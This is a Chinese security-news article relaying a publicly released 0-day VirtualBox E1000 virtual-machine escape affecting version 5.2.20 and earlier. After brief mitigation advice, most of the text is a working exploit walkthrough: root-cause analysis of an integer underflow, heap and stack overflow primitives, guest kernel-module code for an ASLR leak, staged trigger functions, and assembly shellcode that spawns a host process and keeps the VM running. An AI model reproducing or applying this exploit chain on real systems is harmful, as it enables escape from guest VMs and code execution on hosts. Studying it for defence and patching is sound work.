VirtualBox 0day虚拟机逃逸漏洞被发布到Github
在不久之前,VirtualBox的一个虚拟机逃逸漏洞详情被公布到Github上。作者称其非常喜欢VirtualBox,但是作者对现今的信息安全制度深恶痛绝,尤其是漏洞赏金计划!作者提到其最厌恶的三个点:1.持续时间久,提交一个漏洞要等半年才能走完整个流程。2.变动大,可能今天确定的事明天就不确定了。3.收录列表不精确。4.营销太多。作者对此的回应就是:一把梭,就是放,找到一个漏洞就公开一个0day,认为这样能促使信息安全进步。(此非编辑或安全客态度)
目前来看,作者并未售卖漏洞,是个耿直boy了。
漏洞基本信息
影响版本:VirtualBox 5.2.20及早期版本
主机系统:任意
客户系统:任意
虚拟机配置:默认(网卡为Intel Pro/1000 MT 桌面版(82540EM)网络模式为NAT)
漏洞简介
VirtualBox默认虚拟网络设备为上文的82540EM(NAT模式),以下简称E1000。
E1000存在漏洞,允许guest虚拟机中拥有管理员权限的攻击者转移到主机ring3中,并利用其它方式(/dev/vboxdrv)提权至ring0。
漏洞修复
将虚拟机网卡设置为PCnet或半虚拟网络。如果不更改网卡则需将模式从NAT改为其他模式(但前者更安全)。
漏洞详情
E1000
虚拟机中发送网络数据包时,guest虚拟机操作与主机类似:配置网卡并提供数据包;数据包是数据链路层帧及更高级别头信息。供到适配器的数据包则封装在Tx描述符中(Tx意为传输)。Tx描述符是82540EM数据表(317453006EN.PDF,Revision 4.0 )中的数据结构,包含包大小、VLAN标记、TCP/IP分段标志等元数据。
82540EM数据表提供了三种Tx描述符类型:Legacy、Context和Data。Legacy基本已被弃用,另外两个则是目前常用的。而这次需要关注的则是Context设置数据包大小、切换TCP/IP分段以及Data保存数据包物理地址和大小。Data数据包大小必须小于Context设置的最大数据包大小,通常先向网卡提交Context后提交Data。
向网卡提交Tx描述符时,猜测会将它们写入到Tx Ring中,此为预定义地址物理内存中的Ring缓冲区。当所有描述符写入Tx Ring中时,guest虚拟机会更新E1000 MMIO TDT寄存器告知主机有新的描述符需要进行处理。
输入
假设以下为一些Tx描述符数组样例
[context_1, data_2, data_3, context_4, data_5]
并假设如下方式分配结构和内容
context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true
data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true
data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true
并进行下述分析
根本原因分析
[context_1,data_2,data_3]处理过程
假设上述描述符以指定顺序写入Tx Ring,并更新了TDT寄存器,那么主机将执行src/VBox/Devices/Network/DevE1000.cpp文件中的e1kXmitPending函数。
static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
{
while (e1kLocateTxPacket(pThis))
{
fIncomplete = false;
rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
if (RT_FAILURE(rc))
goto out;
rc = e1kXmitPacket(pThis, fOnWorkerThread);
if (RT_FAILURE(rc))
goto out;
}
e1kTxDLazyLoad将读取Tx Ring中的5个Tx描述符,并调用e1kLocateTxPacket。此函数将遍历描述符并初始化,但并不真的去处理它们。第一次调用该函数将会处理context_1,、data_2与data_3。其余两个描述符将在while的第二次循环中处理(下一节中介绍)。这一部分对于漏洞触发至关重要。
e1kLocateTxPacket如下:
static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
{
E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
switch (e1kGetDescType(pDesc))
{
case E1K_DTYP_CONTEXT:
e1kUpdateTxContext(pThis, pDesc);
continue;
case E1K_DTYP_LEGACY:
...
break;
case E1K_DTYP_DATA:
if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
break;
...
break;
default:
AssertMsgFailed(("Impossible descriptor type!"));
}
context_1是E1K_DTYP_CONTEXT,因此会调用e1kUpdateTxContext函数。如果描述符启用了TCP分段,则会更新TCP分段的上下文。此处就是这种情况。
data_2是E1K_DTYP_DATA,因此执行的操作不重要所以不再讨论。
data_3同上,但data_3.data_length==0所以不执行任何操作。
目前处理了3个描述符,还剩下2个描述符。在switch语句后,检查描述符的end_of_packet字段的值,比如data_3描述符中,data_3.end_of_packet==true,执行一些操作并返回。
if(pDesc-> legacy.cmd.fEOP)
{
... return true ;
}
如果此处为false,则会处理剩下的2个描述符,这种情况就不会触发该漏洞并导致产生错误。
在e1kLocateTxPacket函数结束时,这三个描述符已经准备好解包发送了。e1kXmitPending函数的内部循环中会继续调用e1kXmitPacket,此函数会遍历处理5个描述符。
static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
while (pThis->iTxDCurrent < pThis->nTxDFetched)
{
E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
...
rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
...
if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
break;
}
每个描述符都会被调用e1kXmitDesc函数。
static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
bool fOnWorkerThread)
{
...
switch (e1kGetDescType(pDesc))
{
case E1K_DTYP_CONTEXT:
...
break;
case E1K_DTYP_DATA:
{
...
if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
{
E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
}
else
{
if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
{
...
}
else if (!pDesc->data.cmd.fTSE)
{
...
}
else
{
STAM_COUNTER_INC(&pThis->StatTxPathFallback);
rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
}
}
...
传给该函数的第一个描述符是context_1,无作用。
传给该函数的第二个描述符是data_2,因为所有描述符中都设置有tcp_segmentation_enable==true(pDesc->data.cmd.fTSE),当调用e1kFallbackAddToFrame时处理data_5就会出现整数溢出。
static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
...
uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
/*
* Carve out segments.
*/
int rc = VINF_SUCCESS;
do
{
/* Calculate how many bytes we have left in this TCP segment */
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
if (cb > pDesc->data.cmd.u20DTALEN)
{
/* This descriptor fits completely into current segment */
cb = pDesc->data.cmd.u20DTALEN;
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
}
else
{
...
}
pDesc->data.u64BufAddr += cb;
pDesc->data.cmd.u20DTALEN -= cb;
} while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
if (pDesc->data.cmd.fEOP)
{
...
pThis->u16TxPktLen = 0;
...
}
return VINF_SUCCESS; /// @todo consider rc;
}
此处重要变量是u16MaxPktLen,pThis->u16TxPktLen与pDesc->data.cmd.u20DTALEN。
以下图表为数据描述符执行e1kFallbackAddToFrame函数前后这些变量的值。
Tx Descriptor | Before/After | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
---|---|---|---|---|
data_2 | Before | 0x3010 | 0 | 0x10 |
– | After | 0x3010 | 0x10 | 0 |
data_3 | Before | 0x3010 | 0x10 | 0 |
– | After | 0x3010 | 0x10 | 0 |
其中需要关注的是,当处理data_3时,pThis->u16TxPktLen为0x10。
接着,再来看下e1kXmitPacket的末尾部分。
if(e1kGetDescType(pDesc)!= E1K_DTYP_CONTEXT && pDesc-> legacy.cmd.fEOP)
break ;
因为data_3不为E1K_DTYP_CONTEXT并且data_3.end_of_packet==true,所以尽管后两个描述符还没处理,循环也将中断。这里非常重要,因为所有Data描述符都是在Context描述符之后处理的。在e1kLocateTxPacket中TCP分段上下文更新时处理Context描述符,并在e1kXmitPacket函数内循环中处理Data描述符,开发人员这种处理是为了在执行过程中禁止改变u16MaxPktLen防止出现整数溢出。
uint32_t cb = u16MaxPktLen - pThis-> u16TxPktLen;
但是我们可以绕过这个保护措施,在e1kLocateTxPacket中,data_3.end_of_packet==true,可以强制函数返回,因此有两个描述符留置处理。虽然pThis->u16PktLen为0x10而非0,因此可用context_4.maximux_segment_size来改变u16MaxPktLen造成整数溢出。
[context_4,data_5]处理
再回到e1kXmitPending的循环中看:
while (e1kLocateTxPacket(pThis))
{
fIncomplete = false;
rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
if (RT_FAILURE(rc))
goto out;
rc = e1kXmitPacket(pThis, fOnWorkerThread);
if (RT_FAILURE(rc))
goto out;
}
这里e1kLocateTxPacket将对context_4与data_5初始化,我们可以将context_4.maximum_segment_size设置为小于已读取数据大小(即0x10)。
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true
调用e1kLocateTxPacket过程中,我们将最大段大小设置为0xF,已读取数据大小为0x10。
当处理data_5时,当执行e1kFallbackAddToFrame时变量如下:
Tx Descriptor | Before/After | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
---|---|---|---|---|
data_5 | Before | 0xF | 0x10 | 0x4188 |
– | After | – | – | – |
因此会造成整数溢出。
0xFFFFFFFF>0x4188,此处执行如下:
if (cb > pDesc->data.cmd.u20DTALEN)
{
cb = pDesc->data.cmd.u20DTALEN;
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
}
将调用大小为0x4188的e1kFallbackAddSegment函数,如果没有触发漏洞,这里调用大小是无法超过0x4000的。因为e1kUPdateTxContext中TCP分段上下文更新时会检查最大段大小是否小于等于0x4000。
DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
{
pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
...
}
缓冲区溢出
在调用了大小为0x4188的e1kFallbackAddSegment函数后,有两种方法可进行利用。首先数据将会从guest虚拟机读入堆缓冲区:
static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
...
PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
此处pThis->aTxPacketFallback是大小为0x3FA0的缓冲区,u16Len为0x4188,可进行函数指针覆盖。
同时,e1kFallbackAddSegment调用e1kTransmitFrame,可通过E1000寄存器配置调用e1kHandleRxPacket函数,将分配0x4000堆栈缓冲区并将指定长度数据(此处为0x4188长度数据)复制到缓冲区中。
static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
uint8_t rxPacket[E1K_MAX_RX_PKT_SIZE];
...
if (status.fVP)
{
...
}
else
memcpy(rxPacket, pvBuf, cb);
以上两种方式均可进行利用。
利用
该漏洞利用Linux内核模块(LKM)加载到guest操作系统中,而在Windows中则需要一个与LKM稍有不同的驱动。
在两种操作系统中提权均需要加载驱动,但通常这并不是一个大问题。比如近年的Pwn2Own中经常就有这种情况。
这个漏洞利用非常稳定,不会因为一些奇奇怪怪的原因失效。在Ubuntu 16.04和18.04 x86_64中默认配置即可实现。
利用过程
1.攻击者先卸载Linux guest虚拟机中默认加载的e1000.ko并加载漏洞利用的LKM。
2.LKM根据数据表初始化E1000,仅初始化发送部分即可。
3.1.LKM禁用E1000环回模式,使得堆栈缓冲区溢出代码不可达。
3.2.LKM利用漏洞造成堆缓冲区溢出。
3.3.堆缓冲区溢出可用E1000 EEPROM在128KB范围内写入任意两个字节,攻击者获得写原语。
3.4.LKM利用写原语8次,将数据写入堆中ACPI(高级配置和电源接口)数据结构。写入堆缓冲区索引变量后从中读取单字节,因为缓冲区大小小于最大索引号255,攻击者可读缓冲区,获得读原语。
3.5.LKM使用读原语8次访问ACPI并从堆中读8字节数据(VBoxDD.so共享库指针)
3.6.LKM将指针减去RVA即可拿到VBoxDD.so库。
4.1.LKM启用E1000环回模式,使得堆栈缓冲区溢出代码可达。
4.2.LKM利用漏洞造成堆栈缓冲区溢出,返回地址(RIP/EIP)被覆盖,攻击者获得控制权。
4.3.利用ROP链执行shellcode。
5.1.shellcode加载器从堆栈处载入shellcode执行。
5.2.shellcode利用fork和execve系统调用执行进程。
6.攻击者卸载LKM并加载e1000.ko并恢复网络。
初始化
LKM映射E1000 MMIO物理内存,物理地址和大小由管理程序预设。
void* map_mmio(void) {
off_t pa = 0xF0000000;
size_t len = 0x20000;
void* va = ioremap(pa, len);
if (!va) {
printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
return NULL;
}
return va;
}
接着配置E1000通用寄存器,分配Tx Ring存储器,配置发送到寄存器。
void e1000_init(void* mmio) {
// Configure general purpose registers
configure_CTRL(mmio);
// Configure TX registers
g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
if (!g_tx_ring) {
printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
return;
}
configure_TDBAL(mmio);
configure_TDBAH(mmio);
configure_TDLEN(mmio);
configure_TCTL(mmio);
}
绕过ASLR
写原语
在写漏洞利用的时候,我决定不去用那些默认会被禁用的原语,比如提供3D加速服务的Chromium(去年被发现了40多个漏洞)。
那么我们的重点就应该在VirtualBox的各种子系统中寻找泄露信息。一般来讲,整数溢出导致堆缓冲区溢出后,就可控制缓冲区溢出的内容。从中可以获取读取、写入以及信息泄露原语。
我们详细看下堆溢出的内容:
/**
* Device state structure.
*/
struct E1kState_st
{
...
uint8_t aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
E1kEEPROM eeprom;
...
}
此处aTxPacketFallback是大小为0x3FA0的缓冲区,在其中搜索后我们可以找到一些比较有趣的结构:E1kEEPROM,具体如下所示:
/**
* 93C46-compatible EEPROM device emulation.
*/
struct EEPROM93C46
{
...
bool m_fWriteEnabled;
uint8_t Alignment1;
uint16_t m_u16Word;
uint16_t m_u16Mask;
uint16_t m_u16Addr;
uint32_t m_u32InternalWires;
...
}
E1000实现了EEPROM,辅助适配器内存。guest虚拟机可以通过E1000 MMIO寄存器访问它。我们只对EEPROM中的写内存动作感兴趣,如下:
EEPROM93C46::State EEPROM93C46::opWrite()
{
storeWord(m_u16Addr, m_u16Word);
return WAITING_CS_FALL;
}
void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
if (m_fWriteEnabled) {
E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
m_au16Data[u32Addr] = u16Value;
}
m_u16Mask = DATA_MSB;
}
这里m_u16Addr,m_u16Word和m_fWriteEnabled是我们控制的EEPROM93C46结构的字段。
m_au16Data [u32Addr] = u16Value;
语句将在m_au16Data任意16位偏移处写入2个字节,可以找到一个写原语。
读原语
接下来是如何在堆上找到数据结构以写入任意数据,并试图尝试获取共享库指针。在这过程中尽量不要进行堆喷射,因为虚拟设备的主要数据结构是从内部虚拟机管理程序堆中分配,之间距离恒定。
启动虚拟机时,PDM(可插入设备和驱动程序管理器)子系统在虚拟机管理程序堆中分配PDMDEVINS对象。
int pdmR3DevInit(PVM pVM)
{
...
PPDMDEVINS pDevIns;
if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
else
rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...
GDB下跟踪该部门代码可得以下结果:
[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8
[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8
...
[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0
[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848
[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728
[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570
[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90
[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30
E1000设备在0xE位置,其他设备的偏移量为0x5700,0x19E0等等(如上所述,距离相同)。
E1000后就是ICH IC’97,OHCI,ACPI,VirtualBox GIM。
虚拟机启动时,创建ACPI设备(src/VBox/Devices/PC/DevACPI.cpp):
typedef struct ACPIState
{
...
uint8_t au8SMBusBlkDat[32];
uint8_t u8SMBusBlkIdx;
uint32_t uPmTimeOld;
uint32_t uPmTimeA;
uint32_t uPmTimeB;
uint32_t Alignment5;
} ACPIState;
ACPI端口输入输出处理程序注册在0x4100-0x410F,在0x4107端口情况下如下:
PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
RT_NOREF1(pDevIns);
ACPIState *pThis = (ACPIState *)pvUser;
...
switch (off)
{
...
case SMBBLKDAT_OFF:
*pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
pThis->u8SMBusBlkIdx++;
pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
break;
...
当guest操作系统执行INB(0x4107)指令从端口读一个字节时,处理程序从u8SMBusBlkIdx索引处的au8SMBusBlkDat[32]数组中取一个字节并返回给guest虚拟机。应用写原语即如此:因为虚拟设备堆块距离恒定,所以从EEPROM93C46.m_au16Data数组到ACPIState.u8SMBusBlkIdx距离也是一样,将两个字节写入ACPIState.u8SMBusBlkIdx,可以从ACPIState.au8SMBusBlkDat中读255字节范围任意数据。
再来看ACPIState结构,数组在结构末尾,其他字段则用处不大。
gef➤ x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0: 0xffffe98100000090 0xfffd9b2000000000
0x7fc47008d4f0: 0x00007fc470067a00 0x00007fc470067a00
0x7fc47008d500: 0x00000000a0028a00 0x00000000000e0000
0x7fc47008d510: 0x00000000000e0fff 0x0000000000001000
0x7fc47008d520: 0x000000ff00000002 0x0000100000000000
0x7fc47008d530: 0x00007fc47008c358 0x00007fc44d6ecdc6
0x7fc47008d540: 0x0031000035944000 0x00000000000002b8
0x7fc47008d550: 0x00280001d3878000 0x0000000000000000
gef➤ x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6: "ACPI RSDP"
gef➤ vmmap VBoxDD.so
Start End Offset Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤ p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6
有一个指向字符串的指针,该字符串位于VBoxDD.so库固定偏移处,指针位于ACPIState末尾0x58偏移处。我们可以逐字节读该指针,最终获得VBoxDD.so库。我们只希望通过ACPIState结构的数据在每次启动时都不随机。
信息泄露
现在我们把写原语和读原语结合起来利用绕过ASLR。我们将溢出堆覆盖EEPROM93C46结构,并触发EEPROM将索引写入ACPIState结构,在guest虚拟机中执行INB(0x4107)访问ACPI读取指针的一个字节。重复8次后将索引增1。
uint64_t stage_1_main(void* mmio, void* tx_ring) {
printk(KERN_INFO PFX"##### Stage 1 #####\n");
// When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor
// is sent back to the guest and handled right now via e1kHandleRxPacket.
// When loopback mode is disabled data is sent to a network as usual.
// We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
// in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and
// the stack buffer.
e1000_disable_loopback_mode(mmio);
uint8_t leaked_bytes[8];
uint32_t i;
for (i = 0; i < 8; i++) {
stage_1_overflow_heap_buffer(mmio, tx_ring, i);
leaked_bytes[i] = stage_1_leak_byte();
printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
}
uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);
return vboxdd_base;
}
环回模式中,guest虚拟机会将数据包发回给自己,以便发送后立即接收。禁用此模式后,无法访问e1kHandleRxPacket。
DEP
绕过ASLR后,可以启用环回模式并触发堆栈缓冲区溢出。
void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
off_t buffer_pa;
void* buffer_va;
alloc_buffer(&buffer_pa, &buffer_va);
stage_2_set_up_buffer(buffer_va, vboxdd_base);
stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);
free_buffer(buffer_va);
}
void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
printk(KERN_INFO PFX"##### Stage 2 #####\n");
e1000_enable_loopback_mode(mmio);
stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
e1000_disable_loopback_mode(mmio);
}
当执行到e1kHandleRxPacket最后一条指令时,保存的返回地址被覆盖,攻击者可将其转移到任意地址。但仍然需要构建ROP链的方式绕过DEP。
Shellcode
shellcode加载器并不复杂。
use64
start:
lea rsi, [rsp - 0x4170];
push rax
pop rdi
add rdi, loader_size
mov rcx, 0x800
rep movsb
nop
payload:
; Here the shellcode is to be
loader_size = $ - start
shellcode执行后第一部分为:
use64
start:
; sys_fork
mov rax, 58
syscall
test rax, rax
jnz continue_process_execution
; Initialize argv
lea rsi, [cmd]
mov [argv], rsi
; Initialize envp
lea rsi, [env]
mov [envp], rsi
; sys_execve
lea rdi, [cmd]
lea rsi, [argv]
lea rdx, [envp]
mov rax, 59
syscall
...
cmd db '/usr/bin/xterm', 0
env db 'DISPLAY=:0.0', 0
argv dq 0, 0
envp dq 0, 0
利用fork和execve创建/usr/bin/xterm进程,攻击者获得Ring 3控制权。
继续流程
我们期待的并不是DOS,而是希望继续运行下去。shellcode第二部分负责这一块内容:
continue_process_execution:
; Restore RBP
mov rbp, rsp
add rbp, 0x48
; Skip junk
add rsp, 0x10
; Restore the registers that must be preserved according to System V ABI
pop rbx
pop r12
pop r13
pop r14
pop r15
; Skip junk
add rsp, 0x8
; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After: "E1000-Xmit" -> NULL
; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
; This was unnecessary on my testing machines but to be sure...
mov rdi, [rbx]
mov rax, 0x0
mov rcx, 0xA0
rep stosb
; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1")
; will be corrupted in MMHyperFree
mov qword [rbx], 0x0
; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted
ret
当e1kHandleRxPacket被调用时,调用栈为:
#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...
接着将跳转到e1kR3NetworkDown_XmitPending,并且不进行其他操作回到管理程序中。
static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
/* Resume suspended transmission */
STATUS &= ~STATUS_TXOFF;
e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}
shellcode将RB48加到RBP中使得成为e1kR3NetworkDown_XmitPending中的值。接着,寄存器RBX、R12、R13、R14、R15取自堆栈,System V ABI将其保存在被调用函数中,否则将会出现崩溃。
到这就差不多了,虚拟机不会崩溃而是继续运营下去。但是当虚拟机关闭时,PDMR3QueueDestroyDevice函数中存在访问冲突(堆溢出时PDMQUEUE会被覆盖也会被ROP利用过程覆盖),这个问题较难解决。
被覆盖的是链表结构,位于最后一个元素中。
; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
